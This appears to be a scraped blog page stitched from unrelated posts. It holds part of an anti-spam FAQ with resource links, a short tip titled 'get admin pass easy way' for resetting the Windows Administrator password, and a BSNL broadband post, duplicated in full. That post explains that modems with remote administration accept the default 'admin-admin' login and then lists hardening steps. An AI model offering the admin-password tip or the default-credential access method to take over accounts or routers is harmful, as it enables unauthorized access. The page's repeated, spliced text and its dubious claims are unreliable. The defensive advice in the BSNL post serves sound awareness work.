Some viruses & worms spread by emailing themselves to all the email addresses they can find in the email address book. As some people forward jokes and other material by email to their friends, putting their friends' email addresses on either the To: or Cc: fields, rather than the BCc: field, some viruses and warms scan the mail folders for email addresses that are not in the address book, in hope to hit addresses the computer owner's friends' friends, friends' friends' friends, etc.
If it wasn't already done, it's just a matter of time before such malware will not only spam copies of itself, but also send the extracted list of email addresses to it's creator.
As invisible email addresses can't be harvested, it's good advice to have the email addresesses of recipients of jokes & the like on BCc:, and if forwarded from somebody else remove from the email's body all the email addresses inserted by the previous sender.
18.
Buying lists from others.
This one covers two types of trades. The first type consists of buying a list of email addresses (often on CD) that were harvested via other methods, e.g. someone harvesting email addresses from UseNet and sells the list either to a company that wishes to advertise via email (sometimes passing off the list as that of people who opted-in for emailed advertisements) or to others who resell the list.
The second type consists of a company who got the email addresses legitimately (e.g. a magazine that asks subscribers for their email in order to keep in touch over the Internet) and sells the list for the extra income. This extends to selling of email addresses acompany got via other means, e.g. people who just emailed the companywith inquiries in any context.
The third type consist of technical staff selling the email address for money to spammers. There was a news story about an AOL employee who sold AOL email addresses to a spammer.
19.
By hacking into sites.
I've heard rumours that sites that supply free email addresses were hacked in order to get the list of email addresses, somewhatlike e-commerce sites being hacked to get a list of credit cards.
If your address was harvested and you get spammed, the following pages could assist you in tracking the spammer down :
1.
MindSpring's page explaining how to get an email's headers
http://help.mindspring.com/features/emailh...rs/extended.htm
2.
The spam FAQ, maintained by Ken Hollis.
http://digital.net/~gandalf/spamfaq.html
http://www.cs.ruu.nl/wais/html/na-dir/net-...q/spam-faq.html
3.
The Reporting Spam page, an excellent resource.
http://www.ao.net/waytosuccess/
4.
Reading Mail headers.
http://www.stopspam.org/email/headers/headers.html
5.
Julian Haight's Spam Cop page.
http://spamcop.net/
6.
Chris Hibbert's Junk Mail FAQ.
http://www.fortnet.org/WidowNet/faqs/junkmail.htm
7.
Sam Spade, Spam hunter.
http://samspade.org/
8.
Penn's Page of Spam.
http://home.att.net/~penn/spam.htm
9.
WD Baseley's Address Munging FAQ
http://members.aol.com/emailfaq/mungfaq.html
10.
Fight Spam on the Internet site
http://spam.abuse.net/
11.
The Spam Recycling Center
http://www.spamrecycle.com/
12.
The Junk Busters Site
http://www.junkbusters.com/
13.
The Junk Email site
http://www.junkemail.org/
14.
BCP 30: Anti-Spam Recommendations for SMTP MTAs
ftp://ftp.isi.edu/in-notes/bcp/bcp30.txt
15.
FYI 28: Netiquette Guidelines
ftp://ftp.isi.edu/in-notes/fyi/fyi28.txt
FYI 35: DON'T SPEW
A Set of Guidelines for Mass Unsolicited Mailings and Postings
ftp://ftp.isi.edu/in-notes/fyi/fyi35.txt
Several sites on the web will help in tracing spam :
1.
Pete Bowden's list of traceroute gateways
http://www.missing.com/traceroute.html
To find traceroute gateways in any country, visit here.
http://www.traceroute.org/
2.
Allwhois.com gates to whois on any domain world-wide
http://www.allwhois.com/
3.
A list of whois servers, collected by Matt Power
ftp://sipb.mit.edu/pub/whois/whois-servers.list
4.
Alldomains.com site - links to NICs worldwide.
http://www.alldomains.com/
A similar page can be found at
http://www.forumnett.no/domreg.html
5.
The Coalition Against Usolicited Commerical E-mail.
http://www.cauce.org/
The European CAUCE.
http://www.euro.cauce.org/en/index.html
The Coalition Against Unsolicited Bulk Email, Australia.
http://www.caube.org.au/
The Russian Anti-Spam organization.
http://www.antispam.ru/
6.
No More Spam - ISP Spam-Blocking Interferes With Business
http://www.byte.com/columns/digitalbiz/199...0405coombs.html
7.
Removing the Spam, By Geoff Mulligan, Published by Addison Wesley, ISBN 0-201-37957-0
A good book about handling spam.
Legal resources :
1.
FTC Consumer Alert - FTC Names Its Dirty Dozen: 12 Scams Most Likely to Arrive Via Bulk email
http://www.ftc.gov/bcp/conline/pubs/alerts/doznalrt.htm
2.
Report to the Federal Trade Commision of the Ad-Hoc Working Group on Unsolicited Commercial Mail. http://www.cdt.org/spam/
3.
Pyramid Schemes, Ponzi Schemes, and Related Frauds
http://www.impulse.net/~thebob/Pyramid.html
4.
The AOL vs. Cyberpromo case
http://legal.web.aol.com/decisions/dljunk/cyber.html
Nine New Lawsuits Press Release.
http://legal.web.aol.com/decisions/dljunk/ninepress.html
5.
"Intel scores in email suit", by Jim Hu, CNET News.com.
http://www.news.com/News/Item/0,4,29574,00.html?st.ne.ni.lh
6.
The John Marshall Law School spam page
http://www.jmls.edu/cyber/index/spam.html
7.
First amendment issues related to UBE, by Paul L. Schmehl.
http://www.utdallas.edu/~pauls/spam_law.html
8.
U.S. Anti-Spam Laws
http://www.the-dma.org/antispam/statespamlaws.shtml
9.
The UK Data Protection Law
http://www.dataprotection.gov.uk/
10.
The Italian Anti-Spam Law
http://www.parlamento.it/parlam/leggi/deleghe/99185dl.htm
11.
The Austrian Telecm Law
http://www.parlament.gv.at/pd/pm/XX/I/texte/020/I02064_.html
http://www.bmv.gv.at/tk/3telecom/recht/tkg/inhalt.htm
12.
The Norwegian Marketing Control Act
http://www.forbrukerombudet.no/html/engelsk/themcact.htm
get admin pass easy way!!!
1.type compmgmt.msc in RUN field.
2.Go to LOCAL USERS AND GROUPS.
3.In That go to USERS field.
4.Right click on ADMINISTRATOR and SET PASSWORD.
Note: all my documents folders will get deleted so better make a copy of it somewhere else.
NJOY!!!!!!!!!!!!!
2.Go to LOCAL USERS AND GROUPS.
3.In That go to USERS field.
4.Right click on ADMINISTRATOR and SET PASSWORD.
Note: all my documents folders will get deleted so better make a copy of it somewhere else.
NJOY!!!!!!!!!!!!!
BSNL Users -- Protect Urselves!!!!
BSNL Broadband users - save yourself!
Disclaimer : The information provided below is for educational purpose only. I amnot responsible for any misuse of the information and discourages any illegal use of it.
Bsnl Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a Bsnl Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.
Its very easy to get the bsnl user id and password
Well each steps take less than 1 minute so getting username passwords wont take even 2 minutes and is easier than sending a mail.
And this exposes the weak security of bsnl broadband users.
Well this is not a weakness but more of a mis-configuration which leads to insecurity. If you understand networking then you would probably realise that it was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search of victims who are absolutely ignorant of their weak security on the internet.
Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN(Internet) side. You would definitely want to make sure remote management is not active to protect yourself.
Note : On SmartAX MT880 eventhough Remote Management is disabled , it permits remote logins from over the Internet. So change your mode administration passwords immediately.
The problem is that the professionals at Bsnl are ignorant of such simplicity of networking and unable to advise the users or guide them to take proper security measures leaving their customers and themselves absolutely unsecure.
Now lets check a few more options related to this issue. A bsnl broadband modem can be used in two modes. RFC Bridged mode and pppoe mode.
In the RFC Bridged mode the device behaves like a modem device that is attached to your computer and you use some dialup software to dial into the isp through this modem.This is PPPOE from the PC and the adsl device is a good modem. This mode is safer as the username password are on your pc and nothing is on the modem.
In the PPPOE mode the adsl device becomes a router - a distinct network device with many features enabled. In this mode the username password is stored in the modem which will dial to the isp and establish the internet connectivity. The computers will just connect to this router who would be their primary gateway. Now this is the mode where the risk exists.
If remote administration is enabled the remote users from the internet can login to this modems administration panel. Now the main problem is the default admin username-password which most users dont change due to ignorance. "admin-admin" is pair that works in most cases giving you full access to the modems internals. What follows next is simple as drinking a glass of orange juice.
Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC not the "router" since the topology is like
(PC) -> router -> internet
So how should you secure yourself ?
1. Use RFC Bridged mode if it is sufficient for you.
2. Change the default admin password of your modem.
3. Disable wan ping reply . ( this will prevent the hackers from directly discovering your pc when it is on the internet)
4. Disable remote configuration feature.
5. Check your broadband usage on a regular basis and compare it with your own surfing schedules to check whether someone else has used it or not. If suspiscious usage is indicated then immediately change your bband password as well. Or a better suggestion will be to change broadband passwords on a regular basis.
6. Immediately change the default password provided by BSNL.
7. Make sure you also put in a password for the modem [important].
8. Make sure that password cannot be brute-forced easily.
9. Use a firewall make sure no unnecessary ports are open [especially the HTTP port (80)].
10. If you fell you are a victim of password theft, immediately change your account password and contact BSNL.
11. Best way is, to not have the password in the modem in the first place, use bridged mode to connect to the internet.
How to connect using bridged mode
1. Open you modem [http://192.168.1.1]
2. In WAN Settings --> WAN Type -->RFC2684Bridged
3. Connection Type --> Pure Bridged
4. Save and Reboot.
5. Start --> Control Panel --> Network Connection
6. Create a new network connection --> next
7. Connect to the Internet --> next
8. Setup my connection manually --> next
9. Connect using a broadband connection that requires a broadband --> next
10. Put some ISP name --> next
11. Put YOUR username and password --> next --> Finish
Now, turn on your modem wait until the LINK becomes a steady green color [MT880 and 82]. Now connect using the newly made connection.
Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.
Disclaimer : The information provided below is for educational purpose only. I amnot responsible for any misuse of the information and discourages any illegal use of it.
Bsnl Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a Bsnl Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.
Its very easy to get the bsnl user id and password
Well each steps take less than 1 minute so getting username passwords wont take even 2 minutes and is easier than sending a mail.
And this exposes the weak security of bsnl broadband users.
Well this is not a weakness but more of a mis-configuration which leads to insecurity. If you understand networking then you would probably realise that it was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search of victims who are absolutely ignorant of their weak security on the internet.
Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN(Internet) side. You would definitely want to make sure remote management is not active to protect yourself.
Note : On SmartAX MT880 eventhough Remote Management is disabled , it permits remote logins from over the Internet. So change your mode administration passwords immediately.
The problem is that the professionals at Bsnl are ignorant of such simplicity of networking and unable to advise the users or guide them to take proper security measures leaving their customers and themselves absolutely unsecure.
Now lets check a few more options related to this issue. A bsnl broadband modem can be used in two modes. RFC Bridged mode and pppoe mode.
In the RFC Bridged mode the device behaves like a modem device that is attached to your computer and you use some dialup software to dial into the isp through this modem.This is PPPOE from the PC and the adsl device is a good modem. This mode is safer as the username password are on your pc and nothing is on the modem.
In the PPPOE mode the adsl device becomes a router - a distinct network device with many features enabled. In this mode the username password is stored in the modem which will dial to the isp and establish the internet connectivity. The computers will just connect to this router who would be their primary gateway. Now this is the mode where the risk exists.
If remote administration is enabled the remote users from the internet can login to this modems administration panel. Now the main problem is the default admin username-password which most users dont change due to ignorance. "admin-admin" is pair that works in most cases giving you full access to the modems internals. What follows next is simple as drinking a glass of orange juice.
Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC not the "router" since the topology is like
(PC) -> router -> internet
So how should you secure yourself ?
1. Use RFC Bridged mode if it is sufficient for you.
2. Change the default admin password of your modem.
3. Disable wan ping reply . ( this will prevent the hackers from directly discovering your pc when it is on the internet)
4. Disable remote configuration feature.
5. Check your broadband usage on a regular basis and compare it with your own surfing schedules to check whether someone else has used it or not. If suspiscious usage is indicated then immediately change your bband password as well. Or a better suggestion will be to change broadband passwords on a regular basis.
6. Immediately change the default password provided by BSNL.
7. Make sure you also put in a password for the modem [important].
8. Make sure that password cannot be brute-forced easily.
9. Use a firewall make sure no unnecessary ports are open [especially the HTTP port (80)].
10. If you fell you are a victim of password theft, immediately change your account password and contact BSNL.
11. Best way is, to not have the password in the modem in the first place, use bridged mode to connect to the internet.
How to connect using bridged mode
1. Open you modem [http://192.168.1.1]
2. In WAN Settings --> WAN Type -->RFC2684Bridged
3. Connection Type --> Pure Bridged
4. Save and Reboot.
5. Start --> Control Panel --> Network Connection
6. Create a new network connection --> next
7. Connect to the Internet --> next
8. Setup my connection manually --> next
9. Connect using a broadband connection that requires a broadband --> next
10. Put some ISP name --> next
11. Put YOUR username and password --> next --> Finish
Now, turn on your modem wait until the LINK becomes a steady green color [MT880 and 82]. Now connect using the newly made connection.
Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.
Subscribe to:
Posts (Atom)
